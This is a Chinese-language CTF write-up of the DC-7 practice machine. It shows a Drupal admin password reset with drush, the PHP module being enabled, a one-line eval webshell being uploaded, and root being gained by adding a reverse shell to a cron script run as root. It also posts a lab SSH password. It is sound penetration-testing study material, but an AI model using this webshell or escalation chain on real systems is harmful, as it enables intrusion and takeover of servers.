今天咱们来学习第七个靶机！！！

1实验环境

攻击机：kali2023.2

靶机：DC-7

2.1主机发现

2.2端口扫描

依旧是开了两个端口，一个 22 一个 80 ！！！

3.1查看对方网页

在这里我找了半天也没有找出来是有什么线索还是什么，也尝试了找一些注入点啊或者什么的，但是都不行，总之就是卡住了，然后我看了一下题解，他这个账号密码给的很莫名其妙，是在 github上面放着的！！！其实只要百度一下就大概率能找到，但是我可能因为经验少吧，完全没想到还能这么搜，所以第一步就卡了半天，然后咱们看看接下来是怎么个是事儿！！！

4.1登录 ssh

dc7user 的密码：MdR3xOgB7#dW     给大家放这儿了，手打可能会出错！！！

这个账号密码在web上登不上去的，所以试了一下 ssh 是可以的！！！

虽然登上这个了然后就又迷茫了，因为我找了半天并没有发现什么东西！！！然后搜了一下找见一个这个东西

这是一个配置brupal网站里的一个东西，因为我并不是很了解这玩意儿，用的也不多，可能经常搞运维的人会比较了解这东西，然后大家可以稍微搜一下然后学习学习这个玩意儿，后面会用到！！！

4.2修改admin密码

通过drush这个东西可以修改用户密码！！！

这里记得要切换到 /var/www/html 目录下在执行命令，否则会失败的！！！

4.3登录admin账户

发现可以编辑一些页面，那我们自然而然就想到可不可以上传一些php代码，然后进行反弹一个shell

4.4下载php插件

我这里很呆，直接去传一句话木马，发现不行，然后查了一下才知道需要下载插件！！！

地址附给大家：https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

下载好以后大家安装一下即可！！！

在编辑界面有了这个选项就成功了！！！

5.1上传PHP一句话木马

<?php
@eval($_REQUEST[666]);
?>

有三个页面其实都可以，大家随便，我用的是这个欢迎界面！！！

5.2连蚁剑

5.3反弹shell

6.1梳理一下思路

前面其实我们落了一个东西！

这是一个定时执行的脚本，然后我们可以看一下他的权限！

www-date 这个用户是有读写执行的权限，但是其他用户只可以读和执行这个脚本，但是没有写的权限，这也就是为什么我们上面要拿到www这个用户的shell，我们拿到以后在这个脚本里加入反弹shell的权限，然后再执行一下这个脚本，由于执行的时候是以root身份执行的，所以会反弹给我们一个root的shell！！！

现在思路理清了！！！

7.1写脚本

成功写入我们的代码！！！

7.2执行脚本

先开启监听端口！！！

我们在dc7user的shell里执行一下这个脚本！！！

成功反弹rootshell

7.3拿下flag

怎么说呢，这个靶机也是非常有趣！！！大家做一做get一下他那个点！！！

~~~~持续更新中